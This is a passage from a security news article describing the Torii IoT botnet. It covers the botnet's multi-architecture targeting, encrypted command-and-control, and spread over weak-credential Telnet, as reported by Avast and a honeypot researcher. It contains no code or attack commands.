Security researchers discovered a new IoT botnet that is in a league superior to the Mirai variants that rise and fall on a daily basis.
The developers of the botnet seek wide coverage and for this purpose they created binaries for multiple CPU architectures, tailoring the malware for stealth and persistence.
Communication with the command and control (C2) servers is encrypted and capabilities include exfiltration and, command execution.
According to research from Avast, the malware has been active since at least December 2017 and it targets devices on several CPU architectures: like MIPS, ARM, x86, x64, PowerPC, and SuperH.
Although multi-platform support is common among Mirai-based threats, the researchers say Torii supports one of the largest sets of architectures they’ve seen so far.
Telnet attacks coming through Tor
Reputed security researcher Dr. Vesselin Bontchev caught a sample of this malware in his Telnet honeypot. He noticed that the attack was on port 23 specific to Telnet, but the communication was tunneled through the Tor network, a detail that inspired Avast for the botnet name.
My honeypot just caught something substantially new. Spreads via Telnet but not your run-of-the-mill Mirai variant or Monero miner…
First stage is just a few commands that download a rather sophisticated shell script, disguised as a CSS file. (URL is still live.) pic.twitter.com/r5L0I8PC0h
— Vess (@VessOnSecurity) September 19, 2018
Torii infects systems that have Telnet exposed and protected by weak credentials. It executes a sophisticated script that determines the architecture of the device, and…